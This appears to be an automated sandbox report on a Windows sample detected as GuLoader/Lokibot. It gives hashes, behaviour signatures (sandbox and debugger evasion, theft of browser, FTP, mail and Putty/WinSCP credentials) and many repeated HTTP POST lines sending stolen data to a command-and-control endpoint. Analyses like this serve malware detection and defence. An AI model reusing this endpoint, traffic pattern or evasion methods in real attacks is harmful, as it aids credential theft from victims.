Windows Analysis Report 8rbuJ8Ycv1.exe

Overview

General Information

Sample Name:	8rbuJ8Ycv1.exe
Analysis ID:	451510
MD5:	546f9c26cb739f1e3ea5ba1605aa7328
SHA1:	452ee936bbade0510c6c56d6e2b25f6ce7b835ff
SHA256:	6bd6a8e685288ca0af1d41d4d88fabd465f211c7cef32c00c994b89ea0a94f51
Infos:
Most interesting Screenshot:

Detection

GuLoader Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

GuLoader behavior detected

Multi AV Scanner detection for submitted file

Yara detected Lokibot

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found large amount of non-executed APIs

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: 8rbuJ8Ycv1.exe

ReversingLabs: Detection: 41%

Compliance:

Uses 32bit PE files

Source: 8rbuJ8Ycv1.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 199.195.117.165:443 -> 192.168.2.4:49772 version: TLS 1.2

Networking:

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
